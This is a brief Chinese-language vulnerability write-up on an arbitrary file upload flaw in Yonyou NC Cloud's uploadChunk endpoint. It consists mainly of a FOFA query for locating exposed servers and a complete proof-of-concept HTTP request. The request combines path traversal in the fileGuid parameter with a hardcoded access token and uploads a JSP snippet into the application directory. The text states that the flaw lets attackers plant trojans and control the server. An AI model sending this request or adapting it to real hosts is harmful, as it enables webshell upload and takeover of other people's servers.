漏洞描述
用友NC Cloud uploadChunk文件存在任意文件上传漏洞,攻击者通过此漏洞可实现上传木马文件,控制服务器。
漏洞复现
fofa语法:app=”用友-NC-Cloud”
POC:
POST /ncchr/pm/fb/attachment/uploadChunk?fileGuid=/../../../nccloud/&chunk=1&chunks=1 HTTP/1.1
Host:
Content-Type: multipart/form-data; boundary=024ff46f71634a1c9bf8ec5820c26fa9
accessTokenNcc: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VyaWQiOiIxIn0.F5qVK-ZZEgu3WjlzIANk2JXwF49K5cBruYMnIOxItOQ
Content-Length: 170
--024ff46f71634a1c9bf8ec5820c26fa9
Content-Disposition: form-data; name="file"; filename="test.txt"
<% out.print("hello");%>
--024ff46f71634a1c9bf8ec5820c26fa9--